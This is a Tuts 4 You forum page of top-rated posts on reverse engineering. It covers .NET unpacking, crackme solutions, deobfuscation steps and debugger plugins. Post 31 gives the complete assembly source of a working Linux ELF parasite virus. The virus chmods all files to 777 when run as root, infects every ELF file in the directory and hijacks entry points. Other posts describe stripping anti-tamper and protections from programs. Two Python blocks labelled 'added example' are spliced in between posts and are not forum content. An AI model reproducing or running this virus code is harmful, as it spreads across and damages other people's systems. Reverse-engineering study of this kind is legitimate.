Tuts 4 You

Leaderboard


Popular Content

Showing content with the highest reputation since 04/21/2019 in all areas

  1. 6 points
    Everyone can see the code because Cawk's ConfuserEx unpacker works just fine.
  2. 4 points
    Hmmmm... Could it be because you didn't do time travel and never experienced 4th of May 2019 before? The expired certificate is inside your outdated copy of Firefox 56. And, as you said it yourself - you refuse to update it. So, how on earth do you expect Mozilla to fix something that's on your computer? Should they send Santa with magic powers to your home? Solution: download the XPI file from above. Extract files from it. Base64-decode new certificate from api.js. Add new certificate into your old Firefox (Tools-Options-Certificates). Done. Takes less time than writing those whiny posts. Full disclaimer: I couldn't test it 100% because I don't use Firefox on a daily basis and I couldn't find portable Firefox 56 with 3rd party addons.
  3. 3 points
    Download: https://github.com/horsicq/nfdx64dbg/releases Sources: https://github.com/horsicq/nfdx64dbg More Info: https://n10info.blogspot.com/2017/05/nfd-plugin-for-x64dbg.html
  4. 3 points
    And here is the fully deobfuscated file with strings decrypted. I haven't run it through de4dot since this will simplify your button click method to one MessageBox.Show. Unpacked.exe
  5. 3 points
    Here is the code without strings decrypted, more to show that I haven't just remade the method from scratch but have actually devirtualised the file. The obfuscator is not that good in all honesty; once you get your head around everything in one method it's just like any other VM.

    private void button1_Click(object sender, EventArgs e)
    {
        int num = 0;
        if (num != 0)
        {
            object obj;
            char[] value = obj = new char[16];
            obj[0] = (2049885642 ^ 2049885579);
            obj[1] = (721969625 ^ 721969580);
            obj[2] = (1722827470 ^ 1722827450);
            obj[3] = (675984423 ^ 675984463);
            obj[4] = (1647779473 ^ 1647779505);
            obj[5] = (1793770717 ^ 1793770638);
            obj[6] = (640259843 ^ 640259958);
            obj[7] = (959731082 ^ 959731177);
            obj[8] = (1744869780 ^ 1744869879);
            obj[9] = (237600744 ^ 237600653);
            obj[10] = (492056264 ^ 492056251);
            obj[11] = (327956409 ^ 327956426);
            obj[12] = (688741927 ^ 688741953);
            obj[13] = (658212064 ^ 658211989);
            obj[14] = (454212694 ^ 454212666);
            obj[15] = (28756323 ^ 28756290);
            MessageBox.Show(new string(value));
        }
        else
        {
            object obj;
            char[] value2 = obj = new char[10];
            obj[0] = (1435200779 ^ 1435200842);
            obj[1] = (853162666 ^ 853162719);
            obj[2] = (2119875586 ^ 2119875702);
            obj[3] = (712244489 ^ 712244577);
            obj[4] = (1541140050 ^ 1541140082);
            obj[5] = (2107783153 ^ 2107783095);
            obj[6] = (1703953462 ^ 1703953495);
            obj[7] = (1864360465 ^ 1864360568);
            obj[8] = (2035746888 ^ 2035746852);
            obj[9] = (620298057 ^ 620298088);
            MessageBox.Show(new string(value2));
        }
    }
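As an added example (not part of the post above, and not the poster's tool), here is a small Python helper that does mechanically what you end up doing by hand with output like this: it pulls the `obj[i] = (A ^ B)` assignments out of the devirtualised C# text and folds each XOR pair back into the character it encodes, one string per `new char[N]` array. The embedded snippet is copied from the post; the regex and function names are this example's own. Note that with `num` initialised to 0 only the `else` branch can ever run, so recovering both arrays tells you which message the user actually sees.

```python
import re
from typing import List, Optional

# Decompiled C# from the post above, embedded here as the sample input.
DEVIRTUALISED_SNIPPET = """
int num = 0;
if (num != 0) {
    object obj; char[] value = obj = new char[16];
    obj[0] = (2049885642 ^ 2049885579); obj[1] = (721969625 ^ 721969580);
    obj[2] = (1722827470 ^ 1722827450); obj[3] = (675984423 ^ 675984463);
    obj[4] = (1647779473 ^ 1647779505); obj[5] = (1793770717 ^ 1793770638);
    obj[6] = (640259843 ^ 640259958); obj[7] = (959731082 ^ 959731177);
    obj[8] = (1744869780 ^ 1744869879); obj[9] = (237600744 ^ 237600653);
    obj[10] = (492056264 ^ 492056251); obj[11] = (327956409 ^ 327956426);
    obj[12] = (688741927 ^ 688741953); obj[13] = (658212064 ^ 658211989);
    obj[14] = (454212694 ^ 454212666); obj[15] = (28756323 ^ 28756290);
    MessageBox.Show(new string(value));
} else {
    object obj; char[] value2 = obj = new char[10];
    obj[0] = (1435200779 ^ 1435200842); obj[1] = (853162666 ^ 853162719);
    obj[2] = (2119875586 ^ 2119875702); obj[3] = (712244489 ^ 712244577);
    obj[4] = (1541140050 ^ 1541140082); obj[5] = (2107783153 ^ 2107783095);
    obj[6] = (1703953462 ^ 1703953495); obj[7] = (1864360465 ^ 1864360568);
    obj[8] = (2035746888 ^ 2035746852); obj[9] = (620298057 ^ 620298088);
    MessageBox.Show(new string(value2));
}
"""

# Matches either the declaration of a new char array (group 1: its length)
# or one XOR-encoded element store (groups 2-4: index, left and right constant).
TOKEN_RE = re.compile(
    r"new char\[(\d+)\]"
    r"|\w+\[(\d+)\]\s*=\s*\((\d+)\s*\^\s*(\d+)\)"
)


def recover_xor_strings(source: str) -> List[str]:
    """Return every char[] in `source` that is filled with (A ^ B) constants,
    decoded to a string, in the order the arrays are declared."""
    arrays: List[List[str]] = []
    current: Optional[List[str]] = None
    for m in TOKEN_RE.finditer(source):
        length, index, lhs, rhs = m.groups()
        if length is not None:
            # A new array starts: '?' marks slots the code never assigns.
            current = ["?"] * int(length)
            arrays.append(current)
        elif current is not None and 0 <= int(index) < len(current):
            value = int(lhs) ^ int(rhs)
            # A non-printable result means the constant is not a plain XOR pair
            # (another encoding layer); keep it visible instead of crashing.
            current[int(index)] = chr(value) if 32 <= value < 127 else "?"
    return ["".join(chars) for chars in arrays]


if __name__ == "__main__":
    for s in recover_xor_strings(DEVIRTUALISED_SNIPPET):
        print(repr(s))
```

Run it as-is to see the two messages the crackme can show; feed it any other dnSpy/ILSpy output that uses the same per-character XOR pattern.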
  6. 3 points
    I really, really disagree. Not all websites are valuable. And not all passwords should be chosen to be secure. In fact, this was something I wanted to write about for a long time already, so here it goes: https://lifeinhex.com/my-password-is-password/ (shameless self-promo, I know! )
  7. 2 points
    Embarrassing. Don't trust anything that looks like a pregnancy test kit... Ted.
  8. 2 points
    Run the target first with NETBox so it won't kill the .NET PE.
    Dump with MegaDumper.
    In the dumped exe change Image Base to 400000.
    Fix relocation with Universal Fixer.
    Native DLL UnpackMePlease.dll missing: DllSaver, break if module contains UnpackMePlease.
    Unpacked exes: https://www112.zippyshare.com/v/26CxsdFV/file.html
  9. 2 points
    login pass:
    steps to unpack:
    1. removed anti tamper and some junk calls
    2. cleaned cflow (Thanks to Tesla for cflow cleaning)
    3. removed proxy calls
    4. removed proxy calls again
    5. converted x86 methods to IL
    6. decrypted all constants
    7. cleaned cflow again (Thanks to Tesla for cflow cleaning)
    8. cleaned some small stuff with de4dot.
    UnpackMe3-cleaned_noProxy_noProxy-NoX862-StringDec_cleaned-cleaned.exe
  10. 2 points
    well, your post is in the crackme section. it means unpacking doesn't really matter. but since you want the file unpacked, here you go.
    serial key:
    steps:
    1. removed anti tamper
    2. converted x86 methods to IL
    3. decrypted strings
    4. removed delegates
    5. attempted to clean cflow (but its not very clean.)
    6. cleaned with de4dot
    CrackMe_fixed-NoX862.exe_unpacked-StringDec_nodelegate-cleaned-cleaned.exe
  11. 2 points
    All samples has been pulled into hybrid-analysis.com sandboxes also looks like we disturbed someone: http://atm.cybercrime-tracker.net/index.php?x=threat&hash=b57bc410683aba4c211e407320e6b7746ce25e06d81ddf480711228efd921a6c
  12. 2 points
    https://www.youtube.com/watch?v=bcByQtkpmPg
  13. 2 points
    Best days of programming before all this Java and Android chaos
  14. 2 points
    Thanks a lot for testing. Please download the new version of the plugin: https://github.com/horsicq/stringsx64dbg/releases
  15. 2 points
    Here is the hotfix for anyone who wants to install without turning on Data Collection and Use... hotfix-update-xpi-intermediate@mozilla.com-1.0.2-signed.xpi
  16. 2 points
    https://www.bleepingcomputer.com/news/microsoft/windows-10-start-menu-gets-its-own-process-in-build-1903/ This should have happened a long time ago though it could be an indication Start is becoming bloated under Windows 10... Ted.
  17. 2 points
    You can still read menu item strings using the GetMenuString function. What I meant previously was that you have to change my example code to work differently with the DrawText function as the string of characters for, "Tuts 4 You", was not saved in the menu structure. The next example has, "Tuts 4 You", saved in the menu structure so you will be able to find this using GetMenuString. Each character is individually retrieved from the menu string and DrawText is used to display it. It also cycles through each RGB colour as before. When you click on a menu item GetMenuString is used to get the menu item text. It is then displayed in a message. I have attached both x32 and x64 this time. Apologies for the previous compile mistake! Ted. Appended Menu Items x64.exe Appended Menu Items x32.exe
  18. 2 points
    It builds a lot on your previous crackmes. So, most of the answers are already there. 1) Finding first 2 checks - they are in 2 separate dynamic methods. You can simply patch those; 2) Third check is in yet another dynamic method. You can patch it, and play the game till the end. However, the game never shows success screen. I think it's a bug in the crackme, as I could not find any code that would set the required field; 3) There are different ways to get IL code of the dynamic method, for example, this breakpoint might help: 4) To patch crackme, you need to understand how it stores information about dynamic methods. See previous crackmes and solutions for some details and hints. 5) Also you'll need to understand how jit hook decrypts IL code. There's nothing original in it: VirtualProtect -> decrypt code in-place -> jit it -> encrypt code back -> VirtualProtect. Very easy to break in several different ways. So, attached are 2 different versions of solution. First solution patches all 3 checks, you can play the game till the end but not get the success screen. Second solution gives you instant win and shows success screen. Bonus: the secret "cheat" code is checked on timer procedure. If you type it quickly enough, it will show the playing field: minesweeper-solution-kao.zip
  19. 1 point
    @LCF-AT Open T:\Program Files\brave\73.2.17.13\brave_resources.pak to a hex editor (dont try w/ notepad++) ASCII search for : brave_new_tab.js replace it with arave_new_tab.js or whitespace whole @ : <script src="chrome://newtab/brave_new_tab.js"></script> tested & working greets @NeWOT
  20. 1 point
    I made a small tutorial (originally published on Training Circle forum) about keygenning a recent ATM malware sample who passed our gate. this is addressed to beginners. keygenning.dispcash.19.tutorial.zip
  21. 1 point
    Sometimes I think Opera is run by a bunch of idiots. I've been using Opera since it was built on Presto engine. They break old versions compatibility without a blink of an eye, I have lost my favourites countless times by upgrading previous version of Opera, it was gone like that - hundreds of bookmarks, since then I have stopped using it at all. Then I have switched to this Chrome based version (just because I was too used to right mouse gestures) and I hate it, they change colors like this pink shit, they change the way startup window is shown (speeddial), they have added some artificial animations after opening a new tabs, it's not possible to assign keyboard shortcuts to many actions (why?). I have contacted with them on their Twitter support many times with bug reports, filed their forms to report bugs - no response at all... You should see their support forums, many people are upset about their "breaking changes" and they don't do anything about it. I'm thinking about moving to Vivaldi, looks like much more customizable version.
  22. 1 point
    Here's the unpacked file. I found an old unpacker I had which worked on this file (I won't share). Metadata could be cleaned some more, but here it is. UnpackedBed.exe
  23. 1 point
    You got to start ManagedJitterFr4 (for Confuser) on NetBox 4.0; after that just Jit button when the first assembly is logged - first assembly is the main assembly.
  24. 1 point
    No, those are mostly fake attributes. It's just a modded cfex. I didn't go further to attempt to deobfuscate it because it lags so much at the cctor part of module when compiling to c#. And it has flood calls when checking via IL which makes it harder to remove all calls that needs to be removed.
  25. 1 point
    Run original exe with NETBox 4.0 forget to specify version 4.0: https://forum.tuts4you.com/topic/39321-netbox/ Dump .NET exe main module with MegaDumper: https://forum.tuts4you.com/topic/24087-dotnet-dumper-10/page/3/?tab=comments#comment-177260 You should load original exe with dllsaver: https://forum.tuts4you.com/topic/39871-dllsaver/ As for ILProtector unpacking I've used a private tool I won't share!
  26. 1 point
    Few notes: the .NET module trick is used; you can dump the .NET module with memcpyLogger. You just have to find the first block which starts with MZ. You get the module assembly entry point token with ConfuserExConstant.exe - as file input you enter the original protected file. The Entry Point Token value is 600009C.
    Tools used: https://www115.zippyshare.com/v/HETHPm4D/file.html
    Step 1: Dumping .NET module explained before;
    Step 2: Confuser Exceptions Restore - anti-tamper - this is for decrypting MSIL: https://forum.tuts4you.com/topic/41025-confuser-exceptions-restore-anti-tamper It works just fine; you must unmark "Invoke EP" and "Patch Anti-tamper". So after we nop the first method from <Module>.ctor - this was the anti-tamper; we also fix the entry point of the koi module with 600009C. Here is the partial unpacked exe: https://www8.zippyshare.com/v/M78VMowQ/file.html
    For string decryption I've used this: https://github.com/cawk/ConfuserEx-Static-String-Decryptor/releases Check/Mark "Invoke". For c-flow I've used ConfuserExSwitchKiller. ConfuserExCallFixer.exe for inline methods.
    Here is the completely deobfuscated exe: https://www119.zippyshare.com/v/YFwpUuCv/file.html

    private void method_1(object sender, EventArgs e)
    {
        if (this.textBox_1.get_Text().Length >= 5)
        {
            string str = this.textBox_1.get_Text();
            if (!Directory.Exists(@"Data\\License"))
            {
                MessageBox.Show("Password was not found!", str);
            }
            else
            {
                StreamReader reader = new StreamReader(@"Data\\License\license.dat");
                reader.ReadLine();
                string str3 = reader.ReadLine();
                reader.Close();
                if (Class7.smethod_1(str3) == this.textBox_1.get_Text())
                {
                    MessageBox.Show("Good Job !");
                }
                else
                {
                    MessageBox.Show("password is wrong!");
                }
            }
        }
        else
        {
            MessageBox.Show("Password is invaled or too short!");
        }
    }

    public static string smethod_1(string string_2)
    {
        byte[] inputBuffer = Convert.FromBase64String(string_2);
        AesCryptoServiceProvider provider = new AesCryptoServiceProvider
        {
            BlockSize = 0x80,
            KeySize = 0x100,
            Key = Encoding.ASCII.GetBytes(string_1),
            IV = Encoding.ASCII.GetBytes(string_0),
            Padding = PaddingMode.PKCS7,
            Mode = CipherMode.CBC
        };
        ICryptoTransform transform = provider.CreateDecryptor(provider.Key, provider.IV);
        byte[] bytes = transform.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length);
        transform.Dispose();
        return Encoding.ASCII.GetString(bytes);
    }
  27. 1 point
    Unpacked! pass:
  28. 1 point
    Microsoft is open-sourcing PowerToys on GitHub, so anyone can contribute and create power user tools for Windows 10. The first two utilities that Microsoft is working on for Windows 10 are a new maximize to desktop widget and a Windows key shortcut guide. The maximize to desktop widget places a pop-up button over the maximize button when you hover over it. It's designed to let you quickly send an app to another desktop, utilizing Windows 10's multi-desktop view. The Windows shortcut guide utility simply shows a keyboard shortcut guide when you hold down the Windows key. Microsoft is also considering 10 other utilities for these new PowerToys for Windows 10:
    - Full window manager, including specific layouts for docking and undocking laptops
    - Keyboard shortcut manager
    - Win+R replacement
    - Better alt+tab including browser tab integration and search for running apps
    - Battery tracker
    - Batch file re-namer
    - Quick resolution swaps in task bar
    - Mouse events without focus
    - Cmd (or PS or Bash) from here
    - Contents menu file browsing
    Repo: https://github.com/Microsoft/PowerToys
    Windows Calculator was already open sourced here: https://github.com/Microsoft/calculator Apparently it will soon feature a graphing mode.
  29. 1 point
    I am still not entirely sure what it is you are trying to achieve, I think you may be over-complicating things. If you are setting a custom colour scheme for a window and menus it will be much easier to access those colour values somewhere since you already know them. If you are owner drawing menus on each WM_DRAWITEM there will be no colour values to find unless they have been created. If you know the window coordinates or have a handle to a device context of a bitmap you could use GetPixel function... Ted.
  30. 1 point
    Don't let me son find out about this... 😉 Ted.
  31. 1 point
    //./gcc -m32 -masm=intel -o file file.c //https://www.cs.bgu.ac.il/~caspl152/wiki.files/ps05_152.pdf\ //One-oh-one on Linux Virii written by herm1t (x) VxHeavens.com, June 2010 //Since Ive now written a parasite in both x86 formats (Win & Lin) //Things need to be said about this knowledge and power //When I 1st began writing viruses (or virii for all those correctedness types //I strove to be as a good as 29A - still i fall short of such titles //I owe my mentor herm1t (and other VXRs) a ton of respect //for putting up with my constant annoyances of every line and piece of new code //added - thanks herm1t for not holding my hand (in facf youre tutorial insists upon //c-coding one (why use ASM? more of a challenge, and i save c-code VXng for //rootkits.) Lulz and thanks to everyone else out there who (because I am bad for //reputational marketing images) i wont know, but thanks for //putting up with me, and, my prior VX codes that were not so good (which ill fix up in time) //The VX scene isnt dead, though the VXR is not looked at too kindly these days //contrary to those of old days, now that cybermalware has reached the apex of //causing billions of $$ worth of problems to govt's and systems of the world yearly //We true VXR who only set out to show knowledge can never condone ruining another //system but its what you set out to do with this knowledge that makes you // //This thing isnt perfect. My itr82 jump is faulty (so no files to infect causes problems.) //I was going to fix it, until I realized after testing it against 3 hello-world GTK //and 3 hello-world c-codes that so long as the parasite can eat and live, all programs //will work fine post-infection. If the parasite has a host the parasite lives on, and so //hopefully, with a proper Commensalism relationships in place, so does the host. 
//No files to infect, and the infected host seg-faults and dies turning it into //a Parasitism relationship - but feed it some progs and alive it is again //This parasite only adds its replicator code, it does no true damage (unless i messed up) //--"The Lord will even dwell within the darkness" Solomon 1 Kings 8:12 asm(".intel_syntax noprefix\n"); void main() { asm( "_code:\n" "call _start\n" "_start:\n" "pushad\n" //======================================================================= //GRAB DIRECTORY ENTRIES //USE STACK SPACE FOR NOW // eax ebx ecx edx esi edi //sys_open 0x05 const char __user *filename int flags int mode - - // eax ebx ecx edx esi edi //sys_getdents 0x8d unsigned int fd struct linux_dirent __user *dirent unsigned int count - - "_getdents:\n" "push 0x2e\n" //push "." to stack "mov ebx,esp\n" //load the reg with it "xor ecx,ecx\n" //set option to R_ONLY "mov edx,0x400\n" //READ_ONLY "mov eax,0x05\n" //call open dir "int 0x80\n" "sub esp,0x500000\n" "mov ebx,eax\n" "mov eax,0x8d\n" //getdents "mov ecx,esp\n" //store to stack "mov edx,0x500000\n" //len of reserved space for getdents info "int 0x80\n" //[esp-0x500000] = getdents stuff //======================================================================= // GOT ROOT? 
//IF SO CHMOD ALL FILES // eax ebx ecx edx esi edi //sys_getuid 0xc7 - - - - - "mov eax,0xc7\n" "int 0x80\n" "cmp eax,0x00\n" // ROOT=0x00 "jne _root_chmod_skip\n" //=================================================== //WE GOT ROOT CHMOD RWE ALL FILES 0x777 //ESP = getdents struct // eax ebx ecx edx esi edi //sys_chmod 0x0f const char __user *filename mode_t mode - - - "_root_chmod:\n" "mov ebp,esp\n" "mov ebx,ebp\n" //EBP=GETDENTS //===================================== "xor edi,edi\n" "_iter8:\n" "xor ecx,ecx\n" "mov cx,word ptr [ebx+0x08]\n" "add ecx,ebx\n" "cmp byte ptr[ecx-1],0x00\n" "je _root_chmod_skip\n" "push ecx\n" //start of next entry "cmp byte ptr [ecx-0x01],0x08\n" "je _ffound\n" "pop ecx\n" "mov ebx,ecx\n" "jmp _iter8\n" //===================================== "_ffound:\n" "mov ecx,ebx\n" "add ecx,0x0A\n" "push ebx\n" "mov ebx,ecx\n" //ebx & ecx=fname "mov eax,0x0f\n" //CHMOD "mov ecx,0x1ff\n" //RWE ALL USERS "int 0x80\n" //call "pop ebx\n" "pop ecx\n" "mov ebx,ecx\n" "jmp _iter8\n" //=================================== //================================================= //CONTINUE WITH //PRIVS WE HAVE AND HOPE //FOR THE BEST //================================================= "_root_chmod_skip:\n" "mov ebp,esp\n" "mov ebx,ebp\n" "xor edi,edi\n" "_iter82:\n" "xor ecx,ecx\n" "mov cx,word ptr [ebx+0x08]\n" "add ecx,ebx\n" "cmp byte ptr[ecx],0x00\n" //<--------------****safety loop**** "je _code_end\n" "push ecx\n" //start of next entry "cmp byte ptr [ecx-0x01],0x08\n" "je _ffound2\n" "pop ecx\n" "mov ebx,ecx\n" "jmp _iter82\n" //===================================== "_ffound2:\n" "mov ecx,ebx\n" "add ecx,0x0A\n" //ECX=FNAME "push ebx\n" "jmp _stat\n" "_stat_ret:\n" //AT THIS POINT //[EDI]=HEAP START //[EBP]=GETDETNS INFO //[ESI]=FSIZE //[ESP]= ->GETDENTS.FNAME@0x0A "jmp _fopen\n" "_fopen_ret:\n" "jmp _fread\n" "_fread_ret:\n" "jmp _is_elf\n" "_is_elf_ret:\n" //infect ELF heap //write ELF heap to file //close "pop ebx\n" "pop ecx\n" "mov ebx,ecx\n" "jmp 
_iter82\n" //=================================== //=========================================== //IS IT AN ELF FILE? "_is_elf:\n" "cmp dword ptr[edi],0x464c457f\n" //.FLE "jne _is_elf_ret\n" "cmp byte ptr[edi+0x04],0x01\n" //x86 file? "jne _is_elf_ret\n" "cmp byte ptr[edi+0x05],0x01\n" //LSB? "jne _is_elf_ret\n" "xor eax,eax\n" "mov al,byte ptr[edi+0x28]\n" "xor ecx,ecx\n" "mov cx,word ptr[edi+0x2a]\n" "xor edx,edx\n" "mov dx,word ptr[edi+0x2c]\n" "add eax,edi\n" "_hdr_iter8:\n" "cmp dword ptr[eax],0x01\n" "je _hdr_mod\n" "cmp dword ptr[eax],0x07\n" "ja _is_elf_ret\n" "_itr8_rep:\n" "add eax,ecx\n" "jmp _hdr_iter8\n" "_hdr_mod:\n" //[eax]=P_hdr_start "cmp [eax+0x08],esi\n" "jb _itr8_rep\n" "mov ecx,[eax+0x1c]\n" //ecx=seg_align "add ecx,ecx\n" "mov edx,[eax+0x14]\n" "add edx,ecx\n" "or edx,0x0fff\n" "xor edx,0xfff\n" //edx=align*2 + p_fsize| || "mov [eax+0x14],edx\n" "mov [eax+0x10],edx\n" //file_heap_fsize & memsize incr "mov edx,0x00000007\n" "mov [eax+0x18],edx\n" //last seg is RWE //lets store the orig_ep into an unreserved header location //and head to EOF "mov ecx,edi\n" "mov edx,[ecx+0x18]\n" //edx=orig EP "mov [ecx+0x0c],edx\n" //@file_heap[elf_hdr+0x0c]=host orig_ep "mov ecx,edi\n" "add ecx,esi\n" //========================================= //WE ADJUSTED THE LAST LOAD SEGMENT //WE ADDED 0x1000 2 HEAP WHEN ALLOCATED //NOW ADD IN SHELL+PARASITIC CODE "pushad\n" //save reg state "call _delta\n" "_delta:\n" "mov edi,ecx\n" "pop esi\n" //esi should have code start loc. 
"sub esi,0x124\n" "mov ecx,0x280\n" //# of bytes "rep movsb\n" //========================================= //NOTE: change Orig_ep ->shell "mov ecx,[esp]\n" //ecx=ELF in heap "add ecx,0x18\n" //edi = eof+para_end //get current base "call _delta2\n" "_delta2:\n" "pop ecx\n" "or ecx,0xfff\n" "xor ecx,0xfff\n" //eax = heap file_last_seg //ecx = orig host ep seg //edx = orig host ep value //esi = orig host ep seg 0xfff //edi = heap file eof //esp = heaped file //[esp+0x04] = fsize host //edi-0x200 = host eof parasite start //[esp+0x1c] = ptr -> last seg //get last seg align //calc va of parasite and write it into host ep //calc host orig ep and write opcode jump to it //get parasite start location -> EOF_host //write "X" infected //add cmp to detect eof "x" "mov ebx,edi\n" "sub ebx,0x200\n" "push ebx\n" "mov ebx,eax\n" "add ebx,0x1c\n" "mov ebx,[ebx]\n" "add [esp],ebx\n" "pop ebx\n" "push edx\n" "mov edx,[esp+0x04]\n" "add edx,0x18\n" "or ebx,0xffff0000\n" "xor ebx,0xffff0000\n" "mov ecx,eax\n" "add ecx,0x1c\n" "mov ecx,[ecx]\n" "mov ebx,[esp+0x08]\n" "add ebx,ecx\n" "mov [edx],ebx\n" //hello == 4cac "pop edx\n" //============================================================ // eax ebx ecx edx esi edi //sys_write 0x04 unsigned int fd const char __user *buf size_t count - - // eax ebx ecx edx esi edi //sys_open 0x05 const char __user *filename int flags int mode - - "mov eax,0x05\n" "mov ebx,[esp+0x20]\n" "add ebx,0x0a\n" "mov ecx,0x02\n" "mov edx,0x700\n" "int 0x80\n" "mov ebx,eax\n" "mov eax,0x04\n" "mov ecx,[esp]\n" "mov edx,[esp+0x04]\n" "add edx,0x1000\n" "int 0x80\n" //============================================================ "popad\n" //restore reg state "jmp _code_end\n" //DEBUG******** 1-file COMMENT****** all-files "jmp _is_elf_ret\n" //=========================================== //================================================== // eax ebx ecx edx esi edi //sys_read 0x03 unsigned int fd char __user *buf size_t count - - "_fread:\n" "mov ebx,eax\n" "mov 
eax,0x03\n" "mov ecx,edi\n" "mov edx,esi\n" "int 0x80\n" "jmp _fread_ret\n" //=================================================== // eax ebx ecx edx esi edi //sys_open 0x05 const char __user *filename int flags int mode - - "_fopen:\n" "mov ebx,[esp]\n" "add ebx,0x0a\n" "mov eax,0x05\n" "mov ecx,0x02\n" "mov edx,0x700\n" "int 0x80\n" "cmp eax,0x00\n" "jge _fopen_ret\n" "pop ebx\n" "pop ecx\n" "mov ebx,ecx\n" "jmp _iter82\n" //"jmp _fopen_ret\n" //============================================= // eax ebx ecx edx esi edi //sys_newstat 0x6a char __user *filename struct stat __user *statbuf - - - "_stat:\n" "sub esp,0x100\n" "mov eax,0x6a\n" "mov ebx,ecx\n" "mov ecx,esp\n" "int 0x80\n" //[ecx+0x14]=fsize //===================================== "_heap_alloc:\n" "mov eax,0x2d\n" "mov ebx,edi\n" "int 0x80\n" "mov ebx,eax\n" "add ebx,[ecx+0x14]\n" //fix "add ebx,0x00001000\n" //fsize+virus_size**************** "mov eax,0x2d\n" "int 0x80\n" "sub eax,[ecx+0x14]\n" //fix "sub eax,0x00001000\n" //fsize+virus_size***************** //======================== //CHANGE HEAP TO RWE PRIVS "mov edx,0x07\n" "mov ebx,eax\n" "mov eax,0x7d\n" "int 0x80\n" //EBX = HEAP ADDRESS RWE //======================== "mov edi,ebx\n" //EDI=HEAP START "mov esi,[esp+0x14]\n" //ESI=FSIZE "add esp,0x100\n" "jmp _stat_ret\n" "nop\n" "nop\n" //============================================== //NOTE:JMP TO ORIG HOST EP "_code_end:\n" "add esp,0x500000\n" //return our stack to its orig state "add esp,0xc\n" "popad\n" "pop ecx\n" "mov edi,[eax]\n" "mov ecx,edi\n" "add ecx,0x0c\n" "add edi,[ecx]\n" "xor ecx,ecx\n" "jmp edi\n" //================================================ //================================================ //================================================ "mov eax,0x01\n" "int 0x80\n" "nop\n" "nop\n" "nop\n" ); }
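Added example, written from the defender's side and not part of the post or its author's code: a small Python scanner for the on-disk traces this parasite leaves in an ELF32 file, taken from the post's own comments (the host's original entry point is stashed in the e_ident padding at offset 0x0c, the last PT_LOAD segment is grown and set to RWE, and e_entry is redirected into it). The ELF images it scans are constructed header-only samples built inline, not real binaries; `parse_elf32`, `scan_for_parasite_markers` and `build_sample` are this example's own names. It checks every PT_LOAD rather than only the last one, so it is slightly more general than the specific layout the post modifies.

```python
import struct

ELF_MAGIC = b"\x7fELF"
PT_LOAD = 1
PF_X, PF_W, PF_R = 1, 2, 4
EHDR_FMT = "<16sHHIIIIIHHHHHH"   # Elf32_Ehdr, little-endian, 52 bytes
PHDR_FMT = "<IIIIIIII"            # Elf32_Phdr, 32 bytes
PHDR_FIELDS = ("type", "offset", "vaddr", "paddr", "filesz", "memsz", "flags", "align")


def parse_elf32(data):
    """Return (header dict, list of program-header dicts) for a 32-bit LSB ELF."""
    if len(data) < struct.calcsize(EHDR_FMT) or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    if data[4] != 1 or data[5] != 1:           # EI_CLASS == ELFCLASS32, EI_DATA == LSB
        raise ValueError("only ELF32 little-endian is handled here")
    f = struct.unpack_from(EHDR_FMT, data, 0)
    hdr = {"ident": f[0], "entry": f[4], "phoff": f[5], "phentsize": f[9], "phnum": f[10]}
    phdrs = []
    for i in range(hdr["phnum"]):
        off = hdr["phoff"] + i * hdr["phentsize"]
        if off + struct.calcsize(PHDR_FMT) > len(data):
            raise ValueError("program header table runs past end of file")
        phdrs.append(dict(zip(PHDR_FIELDS, struct.unpack_from(PHDR_FMT, data, off))))
    return hdr, phdrs


def scan_for_parasite_markers(data):
    """List the traces described in the post: original EP saved in e_ident padding,
    a PT_LOAD made writable+executable, and e_entry moved into a writable segment."""
    hdr, phdrs = parse_elf32(data)
    findings = []
    # EI_PAD (bytes 9..15) is reserved and zero in a normal file; the post's code
    # writes the host's original entry point at e_ident offset 0x0c.
    if any(hdr["ident"][9:16]):
        findings.append("nonzero e_ident padding (spec says zero; post stores orig EP at 0x0c)")
    loads = [p for p in phdrs if p["type"] == PT_LOAD]
    entry_seg = None
    for idx, p in enumerate(loads):
        if p["flags"] & PF_W and p["flags"] & PF_X:
            findings.append(f"PT_LOAD #{idx} is writable and executable")
        if p["vaddr"] <= hdr["entry"] < p["vaddr"] + p["memsz"]:
            entry_seg = p
    if entry_seg is None:
        findings.append("entry point lies outside every PT_LOAD segment")
    elif entry_seg["flags"] & PF_W:
        findings.append("entry point lies inside a writable segment")
    return findings


def build_sample(entry, segments, ident_pad=b"\0" * 7):
    """Construct a minimal header-only ELF32 image for testing (not a runnable binary)."""
    ident = ELF_MAGIC + bytes([1, 1, 1, 0, 0]) + ident_pad   # class, data, version, osabi, abiver
    ehdr = struct.pack(EHDR_FMT, ident, 2, 3, 1, entry, 52, 0, 0,
                       52, 32, len(segments), 0, 0, 0)
    phdrs = b"".join(struct.pack(PHDR_FMT, PT_LOAD, off, va, va, fsz, msz, flags, 0x1000)
                     for off, va, fsz, msz, flags in segments)
    return ehdr + phdrs


ORIG_EP = 0x08048100
# Constructed clean layout: text R+X, data R+W, entry inside text.
CLEAN_SAMPLE = build_sample(ORIG_EP, [
    (0x0000, 0x08048000, 0x1000, 0x1000, PF_R | PF_X),
    (0x1000, 0x08049000, 0x0200, 0x0300, PF_R | PF_W),
])
# Constructed layout after the changes the post's code performs: last PT_LOAD grown
# and set to RWE, e_entry pointed into it, host EP saved at e_ident offset 0x0c.
INFECTED_SAMPLE = build_sample(0x08049000 + 0x1200, [
    (0x0000, 0x08048000, 0x1000, 0x1000, PF_R | PF_X),
    (0x1000, 0x08049000, 0x2200, 0x2200, PF_R | PF_W | PF_X),
], ident_pad=b"\0" * 3 + struct.pack("<I", ORIG_EP))

if __name__ == "__main__":
    for name, image in (("clean", CLEAN_SAMPLE), ("infected", INFECTED_SAMPLE)):
        print(name, scan_for_parasite_markers(image) or ["no markers"])
```

Pointing `scan_for_parasite_markers` at `open(path, "rb").read()` gives the same checks on a real file; a writable+executable PT_LOAD or an entry point in a writable segment is rare enough in compiler output that either finding is worth a closer look on its own.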
  32. 1 point
    Nothing really different from your last crackme, just need to run it on de4dot before running on the quick tool i made. (Some stuff copy paste from the last tutorial i made for your last crackme) Tutorial: (Run through de4dot first or it will give errors, no idea why) Opening the .exe on Dnspy we can see that the methods have some kind of decompiler crashing. So what i did was simply loading the .exe and writing each instruction to console to see what is going on. Well a lot of ldc.i4.6 appeared as you can see here Simply made a quick tool to remove this Now you can open it on dnspy and see the actual code. But there are some anti-debuggers so i modified the tool that i made to remove the antidebuggers too. like this You can simply debug it now  CrackMe-antiskid-cleaned-Cleaned.exe
  33. 1 point
    Bug? x32dbg wrong address.
  34. 1 point
